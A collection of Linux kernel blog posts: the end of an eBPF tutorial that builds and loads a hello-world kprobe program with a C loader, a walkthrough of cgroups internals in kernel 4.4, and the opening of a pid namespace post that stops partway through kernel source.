    test_bpf.o:	file format ELF64-unknown


    Disassembly of section .text:

    0000000000000000 bpf_prog:
        0:	b7 01 00 00 0a 00 00 00	r1 = 10
        1:	6b 1a fc ff 00 00 00 00	*(u16 *)(r10 - 4) = r1
        2:	b7 01 00 00 72 6c 64 21	r1 = 560229490
        3:	63 1a f8 ff 00 00 00 00	*(u32 *)(r10 - 8) = r1
        4:	18 01 00 00 48 65 6c 6c 00 00 00 00 6f 20 57 6f	r1 = 8022916924116329800 ll
        6:	7b 1a f0 ff 00 00 00 00	*(u64 *)(r10 - 16) = r1
        7:	bf a1 00 00 00 00 00 00	r1 = r10
        8:	07 01 00 00 f0 ff ff ff	r1 += -16
        9:	b7 02 00 00 0e 00 00 00	r2 = 14
        10:	85 00 00 00 06 00 00 00	call 6
        11:	b7 00 00 00 00 00 00 00	r0 = 0
        12:	95 00 00 00 00 00 00 00	exit
    root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# 

As we can see, the eBPF code is contained in the .text section of ‘test_bpf.o’, it’s size is 13*8=104.

Use the dd to dump the eBPF code.

    root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# dd if=./test_bpf.o  of=test_bpf bs=1 count=104 skip=64
    104+0 records in
    104+0 records out
    104 bytes copied, 0.000221178 s, 470 kB/s
    root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# hexdump test_bpf
    0000000 01b7 0000 000a 0000 1a6b fffc 0000 0000
    0000010 01b7 0000 6c72 2164 1a63 fff8 0000 0000
    0000020 0118 0000 6548 6c6c 0000 0000 206f 6f57
    0000030 1a7b fff0 0000 0000 a1bf 0000 0000 0000
    0000040 0107 0000 fff0 ffff 02b7 0000 000e 0000
    0000050 0085 0000 0006 0000 00b7 0000 0000 0000
    0000060 0095 0000 0000 0000                    
    0000068

OK, now we have our eBPF program ‘test_bpf’, it contains a ‘helloworld’ eBPF program.

Open the perf event kprobe

And get the event id:

    root@192:/home/test/linux-4.9.208/linux-4.9.208# echo 'p:sys_clone sys_clone' >> /sys/kernel/debug/tracing/kprobe_events 
    root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/events/kprobes/sys_clone/id 
    1254

Write a loader

The source code of loader is as following:

    #define _GNU_SOURCE
    #include <unistd.h>
    #include <string.h>
    #include <sys/syscall.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <linux/bpf.h>
    #include <linux/version.h>
    #include <linux/perf_event.h>
    #include <linux/hw_breakpoint.h>
    #include <errno.h>


    int main()
    {
        int bfd;
        unsigned char buf[1024] = {};
        struct bpf_insn *insn;
        union bpf_attr attr = {};
        unsigned char log_buf[4096] = {};
        int ret;
        int efd;
        int pfd;
        int n;
        int i;
        struct perf_event_attr pattr = {};

        bfd = open("./test_bpf", O_RDONLY);
        if (bfd < 0)
        {
        printf("open eBPF program error: %s\n", strerror(errno));
        exit(-1);
        }
        n = read(bfd, buf, 1024);
        for (i = 0; i < n; ++i)
        {
        printf("%02x ", buf[i]);
        if (i % 8 == 0)
            printf("\n");
        }
        close(bfd);
        insn = (struct bpf_insn*)buf;
        attr.prog_type = BPF_PROG_TYPE_KPROBE;
        attr.insns = (unsigned long)insn;
        attr.insn_cnt = n / sizeof(struct bpf_insn);
        attr.license = (unsigned long)"GPL";
        attr.log_size = sizeof(log_buf);
        attr.log_buf = (unsigned long)log_buf;
        attr.log_level = 1;
        attr.kern_version = 264656;
        pfd = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
        if (pfd < 0)
        {
        printf("bpf syscall error: %s\n", strerror(errno));
        printf("log_buf = %s\n", log_buf);
        exit(-1);
        }

        pattr.type = PERF_TYPE_TRACEPOINT;
        pattr.sample_type = PERF_SAMPLE_RAW;
        pattr.sample_period = 1;
        pattr.wakeup_events = 1;
        pattr.config = 1254;
        pattr.size = sizeof(pattr);
        efd = syscall(SYS_perf_event_open, &pattr, -1, 0, -1, 0);
        if (efd < 0)
        {
        printf("perf_event_open error: %s\n", strerror(errno));
        exit(-1);
        }
        ret = ioctl(efd, PERF_EVENT_IOC_ENABLE, 0);
        if (ret < 0)
        {
        printf("PERF_EVENT_IOC_ENABLE error: %s\n", strerror(errno));
        exit(-1);
        }
        ret = ioctl(efd, PERF_EVENT_IOC_SET_BPF, pfd);
        if (ret < 0)
        {
        printf("PERF_EVENT_IOC_SET_BPF error: %s\n", strerror(errno));
        exit(-1);
        }
        while(1);
    }

Something notice:

I first uses the eBPF as a ‘BPF_PROG_TYPE_TRACEPOINT’ to attach to the syscalls tracepoints. But it works, I was quite confusion about this until I read this: https://github.com/iovisor/bcc/issues/748 . So I switch to use kprobe.
The ‘attr.kern_version’ is read from linux-4.9.208/usr/include/linux/version.h file ‘LINUX_VERSION_CODE’
The last ‘while’ is to pin the eBPF in program, also there is method to pin I use ‘while’ to simplify thing.

Before we execute the ‘test_loader’, we first read the ‘/sys/kernel/debug/tracing/trace_pipe’ in Terminal 1, this is where the ‘bpf_trace_printk’ output goes.

Then run the ‘test_loader’ in Terminal 2and we can see the output from Terminal 1 as following:

    root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/trace_pipe 
                bash-13708 [003] d... 51890.256702: : Hello World!
                bash-13708 [001] d... 51905.890740: : Hello World!
                bash-13708 [000] d... 52578.776651: : Hello World!
        gnome-shell-1429  [000] d... 52581.579554: : Hello World!
        gnome-shell-1429  [001] d... 52582.922830: : Hello World!
        gnome-shell-13773 [000] d... 52582.937085: : Hello World!

cgroups internals

2020-01-05T00:00:00+00:00

Concepts

Control groups provide a mechanism to group process/tasks to control there behaviour(limit resource for example). Some of the Concepts:

cgroup: a set of tasks with a set of parameters for one or more subsystems.

subsystem: a recource controller that schedules a resource or applies per-cgroup limits.

hierarchy: a set of cgroups arranged in a tree. Every task in the system is in exactly one of the cgroups in the hierarchy and a set of subsystems.

Cgroups is the fundamental mechanism used by docker. This post will dig into how cgroup is implemented. This post uses kernel 4.4.

Basic structure

task_struct has a ‘cgroups’ field which points a ‘struct css_set’, this contains the process’s cgroups info.

    struct css_set {
        /* Reference count */
        atomic_t refcount;

        /*
        * List running through all cgroup groups in the same hash
        * slot. Protected by css_set_lock
        */
        struct hlist_node hlist;

        /*
        * Lists running through all tasks using this cgroup group.
        * mg_tasks lists tasks which belong to this cset but are in the
        * process of being migrated out or in.  Protected by
        * css_set_rwsem, but, during migration, once tasks are moved to
        * mg_tasks, it can be read safely while holding cgroup_mutex.
        */
        struct list_head tasks;
        struct list_head mg_tasks;

        /*
        * List of cgrp_cset_links pointing at cgroups referenced from this
        * css_set.  Protected by css_set_lock.
        */
        struct list_head cgrp_links;

        /* the default cgroup associated with this css_set */
        struct cgroup *dfl_cgrp;

        /*
        * Set of subsystem states, one for each subsystem. This array is
        * immutable after creation apart from the init_css_set during
        * subsystem registration (at boot time).
        */
        struct cgroup_subsys_state *subsys[CGROUP_SUBSYS_COUNT];

        /*
        * List of csets participating in the on-going migration either as
        * source or destination.  Protected by cgroup_mutex.
        */
        struct list_head mg_preload_node;
        struct list_head mg_node;

        /*
        * If this cset is acting as the source of migration the following
        * two fields are set.  mg_src_cgrp is the source cgroup of the
        * on-going migration and mg_dst_cset is the destination cset the
        * target tasks on this cset should be migrated to.  Protected by
        * cgroup_mutex.
        */
        struct cgroup *mg_src_cgrp;
        struct css_set *mg_dst_cset;

        /*
        * On the default hierarhcy, ->subsys[ssid] may point to a css
        * attached to an ancestor instead of the cgroup this css_set is
        * associated with.  The following node is anchored at
        * ->subsys[ssid]->cgroup->e_csets[ssid] and provides a way to
        * iterate through all css's attached to a given cgroup.
        */
        struct list_head e_cset_node[CGROUP_SUBSYS_COUNT];

        /* all css_task_iters currently walking this cset */
        struct list_head task_iters;

        /* dead and being drained, ignore for migration */
        bool dead;

        /* For RCU-protected deletion */
        struct rcu_head rcu_head;
    };

The ‘mg_***’ field is used to migrate process from one group to another group. ‘hlist’ is used to link all of the ‘css_set’ that in the same hashtable slots. ‘tasks’ is used to link all of the process using this ‘css_set’. ‘cgrp_links’ is used to link a ‘cgrp_cset_link’ which links ‘css_set’ with ‘cgroup’. ‘subsys’ is an array which points ‘cgroup_subsys_state’. A ‘cgroup_subsys_state’ is a specific control data structure.

‘cgroup_subsys_state’ is defined as following:

    struct cgroup_subsys_state {
        /* PI: the cgroup that this css is attached to */
        struct cgroup *cgroup;

        /* PI: the cgroup subsystem that this css is attached to */
        struct cgroup_subsys *ss;

        /* reference count - access via css_[try]get() and css_put() */
        struct percpu_ref refcnt;

        /* PI: the parent css */
        struct cgroup_subsys_state *parent;

        /* siblings list anchored at the parent's ->children */
        struct list_head sibling;
        struct list_head children;

        /*
        * PI: Subsys-unique ID.  0 is unused and root is always 1.  The
        * matching css can be looked up using css_from_id().
        */
        int id;

        unsigned int flags;

        /*
        * Monotonically increasing unique serial number which defines a
        * uniform order among all csses.  It's guaranteed that all
        * ->children lists are in the ascending order of ->serial_nr and
        * used to allow interrupting and resuming iterations.
        */
        u64 serial_nr;

        /*
        * Incremented by online self and children.  Used to guarantee that
        * parents are not offlined before their children.
        */
        atomic_t online_cnt;

        /* percpu_ref killing and RCU release */
        struct rcu_head rcu_head;
        struct work_struct destroy_work;
    };

The ‘struct cgroup’ member represents the ‘cgroup’ that process attaches to. ‘cgroup_subsys’ member points to a specific subsystem.

In fact ‘cgroup_subsys_state’ is embedded in a specific subsystem cgroup. For example, the memory contontroller ‘mem_cgroup’ has following.

    struct mem_cgroup {
        struct cgroup_subsys_state css;

        /* Private memcg ID. Used to ID objects that outlive the cgroup */
        struct mem_cgroup_id id;

        /* Accounted resources */
        struct page_counter memory;
        struct page_counter memsw;
        struct page_counter kmem;
        ...
    }

The ‘css_set’s subsys member points the ‘mem_cgroup’s ‘css’ field.

Following is the definition of ‘struct cgroup’.

    struct cgroup {
        /* self css with NULL ->ss, points back to this cgroup */
        struct cgroup_subsys_state self;

        unsigned long flags;		/* "unsigned long" so bitops work */

        /*
        * idr allocated in-hierarchy ID.
        *
        * ID 0 is not used, the ID of the root cgroup is always 1, and a
        * new cgroup will be assigned with a smallest available ID.
        *
        * Allocating/Removing ID must be protected by cgroup_mutex.
        */
        int id;

        /*
        * Each non-empty css_set associated with this cgroup contributes
        * one to populated_cnt.  All children with non-zero popuplated_cnt
        * of their own contribute one.  The count is zero iff there's no
        * task in this cgroup or its subtree.
        */
        int populated_cnt;

        struct kernfs_node *kn;		/* cgroup kernfs entry */
        struct cgroup_file procs_file;	/* handle for "cgroup.procs" */
        struct cgroup_file events_file;	/* handle for "cgroup.events" */

        /*
        * The bitmask of subsystems enabled on the child cgroups.
        * ->subtree_control is the one configured through
        * "cgroup.subtree_control" while ->child_subsys_mask is the
        * effective one which may have more subsystems enabled.
        * Controller knobs are made available iff it's enabled in
        * ->subtree_control.
        */
        unsigned int subtree_control;
        unsigned int child_subsys_mask;

        /* Private pointers for each registered subsystem */
        struct cgroup_subsys_state __rcu *subsys[CGROUP_SUBSYS_COUNT];

        struct cgroup_root *root;

        /*
        * List of cgrp_cset_links pointing at css_sets with tasks in this
        * cgroup.  Protected by css_set_lock.
        */
        struct list_head cset_links;

        /*
        * On the default hierarchy, a css_set for a cgroup with some
        * susbsys disabled will point to css's which are associated with
        * the closest ancestor which has the subsys enabled.  The
        * following lists all css_sets which point to this cgroup's css
        * for the given subsystem.
        */
        struct list_head e_csets[CGROUP_SUBSYS_COUNT];

        /*
        * list of pidlists, up to two for each namespace (one for procs, one
        * for tasks); created on demand.
        */
        struct list_head pidlists;
        struct mutex pidlist_mutex;

        /* used to wait for offlining of csses */
        wait_queue_head_t offline_waitq;

        /* used to schedule release agent */
        struct work_struct release_agent_work;
    };

‘struct cgroup’ represents a concrete control group. ‘kn’ is the cgroup kernfs entry. ‘subsys’ is an array points to ‘cgroup_subsys_state’, these represets the subsystem that this ‘cgroup’ contains. ‘cset_links’ is used to link to ‘cgrp_cset_link’.

A ‘css_set’ can be associated with multiple cgroups. And also a ‘cgroup’ can be associated with multiple css_sets as different tasks my belong to differenct cgroups on different hierarchies. So this M:N relationship is represented by ‘struct cgrp_cset_link’.

    struct cgrp_cset_link {
        /* the cgroup and css_set this link associates */
        struct cgroup		*cgrp;
        struct css_set		*cset;

        /* list of cgrp_cset_links anchored at cgrp->cset_links */
        struct list_head	cset_link;

        /* list of cgrp_cset_links anchored at css_set->cgrp_links */
        struct list_head	cgrp_link;
    };

Following figures show the data relations:

Cgroups initialization

In start_main early state, it calls ‘cgroup_init_early’ to intialize the subsystem that needs early initialization, this is indicated in the ‘struct cgroup_subsys’s early_init member.

    int __init cgroup_init_early(void)
    {
        static struct cgroup_sb_opts __initdata opts;
        struct cgroup_subsys *ss;
        int i;

        init_cgroup_root(&cgrp_dfl_root, &opts);
        cgrp_dfl_root.cgrp.self.flags |= CSS_NO_REF;

        RCU_INIT_POINTER(init_task.cgroups, &init_css_set);

        for_each_subsys(ss, i) {
            WARN(!ss->css_alloc || !ss->css_free || ss->name || ss->id,
                "invalid cgroup_subsys %d:%s css_alloc=%p css_free=%p name:id=%d:%s\n",
                i, cgroup_subsys_name[i], ss->css_alloc, ss->css_free,
                ss->id, ss->name);
            WARN(strlen(cgroup_subsys_name[i]) > MAX_CGROUP_TYPE_NAMELEN,
                "cgroup_subsys_name %s too long\n", cgroup_subsys_name[i]);

            ss->id = i;
            ss->name = cgroup_subsys_name[i];
            if (!ss->legacy_name)
                ss->legacy_name = cgroup_subsys_name[i];

            if (ss->early_init)
                cgroup_init_subsys(ss, true);
        }
        return 0;
    }

In ‘cgroup_init_early’, it first initializes ‘cgrp_dfl_root’. This is the default ‘cgroup_root’. This is revserved for the subsystems that are not used. It has a single cgroup, and all tasks are part of that cgroup. Then it sets the ‘init_css_set’ to ‘init_task.cgroups’. So if we don’t use cgroup all of the process will use this ‘init_css_set’ as its task_struct.cgroups. Then it iterates all of the subsystems and calls ‘cgroup_init_subsys’ to initialize them.

    static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
    {
        struct cgroup_subsys_state *css;

        printk(KERN_INFO "Initializing cgroup subsys %s\n", ss->name);

        mutex_lock(&cgroup_mutex);

        idr_init(&ss->css_idr);
        INIT_LIST_HEAD(&ss->cfts);

        /* Create the root cgroup state for this subsystem */
        ss->root = &cgrp_dfl_root;
        css = ss->css_alloc(cgroup_css(&cgrp_dfl_root.cgrp, ss));
        /* We don't handle early failures gracefully */
        BUG_ON(IS_ERR(css));
        init_and_link_css(css, ss, &cgrp_dfl_root.cgrp);

        ...
        init_css_set.subsys[ss->id] = css;

        ...
        BUG_ON(online_css(css));

        mutex_unlock(&cgroup_mutex);
    }

First ‘cgroup_init_subsys’ sets ‘cgroup_subsys’s root to the default cgroup_root. Then calls the subsystem’s css_alloc callback to allocate a ‘struct cgroup_subsys_state’. The argument here to css_alloc callback is NULL. The subsystem do some special work for this default cgroup_root. For example, the mem cgroup will set the max value of memory limits.

    static struct cgroup_subsys_state * __ref
    mem_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
    {
        struct mem_cgroup *memcg;
        long error = -ENOMEM;
        int node;

        memcg = mem_cgroup_alloc();
        if (!memcg)
            return ERR_PTR(error);

        for_each_node(node)
            if (alloc_mem_cgroup_per_zone_info(memcg, node))
                goto free_out;

        /* root ? */
        if (parent_css == NULL) {
            root_mem_cgroup = memcg;
            mem_cgroup_root_css = &memcg->css;
            page_counter_init(&memcg->memory, NULL);
            memcg->high = PAGE_COUNTER_MAX;
            memcg->soft_limit = PAGE_COUNTER_MAX;
            page_counter_init(&memcg->memsw, NULL);
            page_counter_init(&memcg->kmem, NULL);
        }
        ...
    }

After get the ‘cgroup_subsys_state’ in ‘cgroup_init_subsys’, the function then calls ‘init_and_link_css’ to initialize the ‘cgroup_subsys_state’ and online_css to call subsystem’s css_online callback.

In the second stage of initialization ‘cgroup_init’ it does more work.

    int __init cgroup_init(void)
    {
        struct cgroup_subsys *ss;
        unsigned long key;
        int ssid;

        BUG_ON(percpu_init_rwsem(&cgroup_threadgroup_rwsem));
        BUG_ON(cgroup_init_cftypes(NULL, cgroup_dfl_base_files));
        BUG_ON(cgroup_init_cftypes(NULL, cgroup_legacy_base_files));

        mutex_lock(&cgroup_mutex);

        /* Add init_css_set to the hash table */
        key = css_set_hash(init_css_set.subsys);
        hash_add(css_set_table, &init_css_set.hlist, key);

        BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));

        mutex_unlock(&cgroup_mutex);

        for_each_subsys(ss, ssid) {
            if (ss->early_init) {
                struct cgroup_subsys_state *css =
                    init_css_set.subsys[ss->id];

                css->id = cgroup_idr_alloc(&ss->css_idr, css, 1, 2,
                            GFP_KERNEL);
                BUG_ON(css->id < 0);
            } else {
                cgroup_init_subsys(ss, false);
            }

            list_add_tail(&init_css_set.e_cset_node[ssid],
                    &cgrp_dfl_root.cgrp.e_csets[ssid]);

            ...
            cgrp_dfl_root.subsys_mask |= 1 << ss->id;

            if (!ss->dfl_cftypes)
                cgrp_dfl_root_inhibit_ss_mask |= 1 << ss->id;

            if (ss->dfl_cftypes == ss->legacy_cftypes) {
                WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
            } else {
                WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
                WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
            }

            if (ss->bind)
                ss->bind(init_css_set.subsys[ssid]);
        }

        WARN_ON(sysfs_create_mount_point(fs_kobj, "cgroup"));
        WARN_ON(register_filesystem(&cgroup_fs_type));
        WARN_ON(!proc_create("cgroups", 0, NULL, &proc_cgroupstats_operations));

        return 0;
    }

First it calls ‘cgroup_init_cftypes’ to initiaze two ‘struct cftype’ ‘cgroup_dfl_base_files’ and ‘cgroup_legacy_base_files’. A ‘cftype’ contains the cgroup control files and its handler. ‘cgroup_dfl_base_files’ is for default hierarchy and ‘cgroup_legacy_base_files’ is for general hierarchy. Unfortunately, we can’t see cgroup_dfl_base_files files as the linux distros will use cgroup to management, so after the system boot, we can see the cgroup_legacy_base_files files.

Then ‘cgroup_init’ caculate the key of ‘init_css_set.subsys’ and insert it to css_set_table. css_set_table contains all of the ‘css_set’.

‘cgroup_setup_root’ is used to setup a ‘cgroup_root’. This function is also called in cgroup_mount, the ‘ss_mask’ argument is the mask of subsystem.

‘allocate_cgrp_cset_links’ allocates ‘css_set_count’ of ‘cgrp_cset_link’. Later it uses these links to link every currently ‘css_set’ to this new ‘cgroup_root’.

    hash_for_each(css_set_table, i, cset, hlist) {
        link_css_set(&tmp_links, cset, root_cgrp);
        if (css_set_populated(cset))
            cgroup_update_populated(root_cgrp, true);
    }

‘kernfs_create_root’ create a new kernfs hierarchy. This is the root directory of this cgroup. ‘css_populate_dir’ creates the files in the root kernfs directory.

‘rebind_subsystems’ binds this ‘cgroup_root’ to the ‘cgroup_subsys’. The most import code is following. Set the ‘ss->root’ to dst_root.

    for_each_subsys_which(ss, ssid, &ss_mask) {
        struct cgroup_root *src_root = ss->root;
        struct cgroup *scgrp = &src_root->cgrp;
        struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
        struct css_set *cset;

        WARN_ON(!css || cgroup_css(dcgrp, ss));

        css_clear_dir(css, NULL);

        RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
        rcu_assign_pointer(dcgrp->subsys[ssid], css);
        ss->root = dst_root;
        css->cgroup = dcgrp;
        ...
    }

After rebind the cgroup_subsys’s root, the ‘cgroup_setup_root’ nearly finishes his job.

Let’s return to ‘cgroup_init’. It calls ‘cgroup_init_subsys’ to initialize the specific subystem. Then set the bit in ‘cgrp_dfl_root.subsys_mask’.

Following code adds the specific subsystem’s cftype to the subsystem while linking to the the ‘cgroup_subsys’s cfts list head.

        if (ss->dfl_cftypes == ss->legacy_cftypes) {
            WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
        } else {
            WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
            WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
        }

Finally, ‘cgroup_init’ creates the mount in ‘/sys/fs/cgroup’ by calling ‘sysfs_create_mount_point’, registers the ‘cgroup_fs_type’ so that the userspace can mount cgroup filesystem, creates the /proc/cgroups to show cgroup status.

Cgroups VFS

At the end of ‘cgroup_init’, a new filesystem ‘cgroup_fs_type’ is registered. This is the cgroup fs.

    static struct file_system_type cgroup_fs_type = {
        .name = "cgroup",
        .mount = cgroup_mount,
        .kill_sb = cgroup_kill_sb,
    };

Every mount will create a new hierarchy, one or more subsystem can be attached to this hierarchy. From the code perspective, ‘cgroup_mount’ a cgroup_root for one or more cgroup_subsys.

‘parse_cgroupfs_options’ is used to parse the options from mount system call and install it in a ‘cgroup_sb_opts’ opts. opts.subsys_mask stores the subsystem which want to attached to this new hierarchy.

Next the ‘cgroup_mount’ drain the unmounted subsystems.

    for_each_subsys(ss, i) {
        if (!(opts.subsys_mask & (1 << i)) ||
            ss->root == &cgrp_dfl_root)
            continue;

        if (!percpu_ref_tryget_live(&ss->root->cgrp.self.refcnt)) {
            mutex_unlock(&cgroup_mutex);
            msleep(10);
            ret = restart_syscall();
            goto out_free;
        }
        cgroup_put(&ss->root->cgrp);
    }

Next ‘for_each_root(root)’ is used to check if the susbsystem has been mounted. If the ‘root’ is the ‘cgrp_dfl_root’, it means this subsystem is not mounted, just contine the loop. The subsystem mounted not once must match each other.

        if ((opts.subsys_mask || opts.none) &&
            (opts.subsys_mask != root->subsys_mask)) {
            if (!name_match)
                continue;
            ret = -EBUSY;
            goto out_unlock;
        }

This means, for example if we first mount cpu,cpuset in /sys/fs/cgroup/cpu,cpuset directory, then we can’t separately mount the cpu or cpuset subsystem. Instead we must also mount cpu,cpuset in a directory. If we have passed the check, then ‘kernfs_pin_sb’ is called to pin the already mounted superblock and just go to out_unlock. Then just mount the already mounted system to the new directory.

If instead, the susbsystem hasn’t been mounted, we need to allocate and initialize a new ‘cgroup_root’.

        root = kzalloc(sizeof(*root), GFP_KERNEL);
        if (!root) {
            ret = -ENOMEM;
            goto out_unlock;
        }

        init_cgroup_root(root, &opts);

        ret = cgroup_setup_root(root, opts.subsys_mask);
        if (ret)
            cgroup_free_root(root);

    out_unlock:
        mutex_unlock(&cgroup_mutex);
    out_free:
        kfree(opts.release_agent);
        kfree(opts.name);

        if (ret)
            return ERR_PTR(ret);

And finally mount the new kernfs to the directory.

        dentry = kernfs_mount(fs_type, flags, root->kf_root,
                    CGROUP_SUPER_MAGIC, &new_sb);
        if (IS_ERR(dentry) || !new_sb)
            cgroup_put(&root->cgrp);

Create a new cgroup

When we create a directory in a subsystem’s fs root directory we create a new group. The kernfs’s syscall ops is set to ‘cgroup_kf_syscall_ops’ in ‘cgroup_setup_root’. And the mkdir handler is ‘cgroup_mkdir’.

    static struct kernfs_syscall_ops cgroup_kf_syscall_ops = {
        .remount_fs		= cgroup_remount,
        .show_options		= cgroup_show_options,
        .mkdir			= cgroup_mkdir,
        .rmdir			= cgroup_rmdir,
        .rename			= cgroup_rename,
    };

Allocate a new ‘cgroup_root’ and initialize the new ‘cgroup_root’

        cgrp = kzalloc(sizeof(*cgrp), GFP_KERNEL);
        if (!cgrp) {
            ret = -ENOMEM;
            goto out_unlock;
        }

        ret = percpu_ref_init(&cgrp->self.refcnt, css_release, 0, GFP_KERNEL);
        if (ret)
            goto out_free_cgrp;

        /*
        * Temporarily set the pointer to NULL, so idr_find() won't return
        * a half-baked cgroup.
        */
        cgrp->id = cgroup_idr_alloc(&root->cgroup_idr, NULL, 2, 0, GFP_KERNEL);
        if (cgrp->id < 0) {
            ret = -ENOMEM;
            goto out_cancel_ref;
        }

        init_cgroup_housekeeping(cgrp);

        cgrp->self.parent = &parent->self;
        cgrp->root = root;

Create the directory and create the files.

        kn = kernfs_create_dir(parent->kn, name, mode, cgrp);
        if (IS_ERR(kn)) {
            ret = PTR_ERR(kn);
            goto out_free_id;
        }
        cgrp->kn = kn;

        /*
        * This extra ref will be put in cgroup_free_fn() and guarantees
        * that @cgrp->kn is always accessible.
        */
        kernfs_get(kn);

        cgrp->self.serial_nr = css_serial_nr_next++;

        /* allocation complete, commit to creation */
        list_add_tail_rcu(&cgrp->self.sibling, &cgroup_parent(cgrp)->self.children);
        atomic_inc(&root->nr_cgrps);
        cgroup_get(parent);

        /*
        * @cgrp is now fully operational.  If something fails after this
        * point, it'll be released via the normal destruction path.
        */
        cgroup_idr_replace(&root->cgroup_idr, cgrp, cgrp->id);

        ret = cgroup_kn_set_ugid(kn);
        if (ret)
            goto out_destroy;

        ret = css_populate_dir(&cgrp->self, NULL);
        if (ret)
            goto out_destroy;

Create and online a ‘cgroup_subsys_state’.

    for_each_subsys(ss, ssid) {
        if (parent->child_subsys_mask & (1 << ssid)) {
            ret = create_css(cgrp, ss,
                    parent->subtree_control & (1 << ssid));
            if (ret)
                goto out_destroy;
        }
    }

Attach process to a cgroup

The process can be moved to a new ‘cgroup’ by writing the pid of process to cgroup’s cgroup.procs or tasks file. Let’s use the first as an example.

    static struct cftype cgroup_legacy_base_files[] = {
        {
            .name = "cgroup.procs",
            .seq_start = cgroup_pidlist_start,
            .seq_next = cgroup_pidlist_next,
            .seq_stop = cgroup_pidlist_stop,
            .seq_show = cgroup_pidlist_show,
            .private = CGROUP_FILE_PROCS,
            .write = cgroup_procs_write,
        },

The actually function is ‘__cgroup_procs_write’. It calls ‘cgroup_attach_task’ to attach a task to a cgroup.

    static int cgroup_attach_task(struct cgroup *dst_cgrp,
                    struct task_struct *leader, bool threadgroup)
    {
        LIST_HEAD(preloaded_csets);
        struct task_struct *task;
        int ret;

        /* look up all src csets */
        spin_lock_bh(&css_set_lock);
        rcu_read_lock();
        task = leader;
        do {
            cgroup_migrate_add_src(task_css_set(task), dst_cgrp,
                        &preloaded_csets);
            if (!threadgroup)
                break;
        } while_each_thread(leader, task);
        rcu_read_unlock();
        spin_unlock_bh(&css_set_lock);

        /* prepare dst csets and commit */
        ret = cgroup_migrate_prepare_dst(dst_cgrp, &preloaded_csets);
        if (!ret)
            ret = cgroup_migrate(leader, threadgroup, dst_cgrp);

        cgroup_migrate_finish(&preloaded_csets);
        return ret;
    }

I won’t go to the detail of these function calls. The point is ‘cgroup_migrate’->’cgroup_taskset_migrate’:

    list_for_each_entry(cset, &tset->src_csets, mg_node) {
        list_for_each_entry_safe(task, tmp_task, &cset->mg_tasks, cg_list) {
            struct css_set *from_cset = task_css_set(task);
            struct css_set *to_cset = cset->mg_dst_cset;

            get_css_set(to_cset);
            css_set_move_task(task, from_cset, to_cset, true);
            put_css_set_locked(from_cset);
        }
    }

How cgroup make an effect to process

From above we know the cgroup internal implementation. Let’s see how it controls process.

The control is done by the subsystem. For example, when the kernel allocates or frees memory for a process, it will call ‘mem_cgroup_try_charge’ to let the memory cgroup invole to make sure the process will never exceed the limits.

pid namespace internals

2019-12-20T00:00:00+00:00

Namespace is another method to abstract resouces. A namespace make it appear to the process within the namespace that they have their own isolated instance of the global resouces. Compared to the virtual machine, namespace is more lightweight. In this post, I will dig into the pid namespace from kernel part. I used kernel 4.4 in this post.

Basic structure

There are six different types of namespaces, they are uts, ipc, mount, pid, net and user. pid namespace is structured together in ‘nsproxy’ structure.

struct nsproxy {
    atomic_t count;
    struct uts_namespace *uts_ns;
    struct ipc_namespace *ipc_ns;
    struct mnt_namespace *mnt_ns;
    struct pid_namespace *pid_ns_for_children;
    struct net 	     *net_ns;
};

‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ to represent the process’s resource view. struct ‘pid_namespace’ is used to represent a pid namespace.

    struct pid_namespace {
        struct kref kref;
        struct pidmap pidmap[PIDMAP_ENTRIES];
        struct rcu_head rcu;
        int last_pid;
        unsigned int nr_hashed;
        struct task_struct *child_reaper;
        struct kmem_cache *pid_cachep;
        unsigned int level;
        struct pid_namespace *parent;
    #ifdef CONFIG_PROC_FS
        struct vfsmount *proc_mnt;
        struct dentry *proc_self;
        struct dentry *proc_thread_self;
    #endif
    #ifdef CONFIG_BSD_PROCESS_ACCT
        struct fs_pin *bacct;
    #endif
        struct user_namespace *user_ns;
        struct work_struct proc_work;
        kgid_t pid_gid;
        int hide_pid;
        int reboot;	/* group exit code if this pidns was rebooted */
        struct ns_common ns;
    };

pidmap member is a struct ‘pidmap’, it’s a bitmap to be used to managing pid value. It’s definition is quite easy.

    struct pidmap {
        atomic_t nr_free;
        void *page;
    };

‘last_pid’ record the last used pid value. ‘child_reper’ is the init process of a pid_namespace. ‘user_ns’ points the user namespace of this pid namespace.

pid namespace is created by function ‘create_pid_namespace’ in the call chain of clone->copy_namespaces->copy_pid_ns->create_pid_namespace.

    static struct pid_namespace *create_pid_namespace(struct user_namespace *user_ns,
        struct pid_namespace *parent_pid_ns)
    {
        struct pid_namespace *ns;
        unsigned int level = parent_pid_ns->level + 1;
        int i;
        int err;

        if (level > MAX_PID_NS_LEVEL) {
            err = -EINVAL;
            goto out;
        }

        err = -ENOMEM;
        ns = kmem_cache_zalloc(pid_ns_cachep, GFP_KERNEL);
        if (ns == NULL)
            goto out;

        ns->pidmap[0].page = kzalloc(PAGE_SIZE, GFP_KERNEL);
        if (!ns->pidmap[0].page)
            goto out_free;

        ns->pid_cachep = create_pid_cachep(level + 1);
        if (ns->pid_cachep == NULL)
            goto out_free_map;

        err = ns_alloc_inum(&ns->ns);
        if (err)
            goto out_free_map;
        ns->ns.ops = &pidns_operations;

        kref_init(&ns->kref);
        ns->level = level;
        ns->parent = get_pid_ns(parent_pid_ns);
        ns->user_ns = get_user_ns(user_ns);
        ns->nr_hashed = PIDNS_HASH_ADDING;
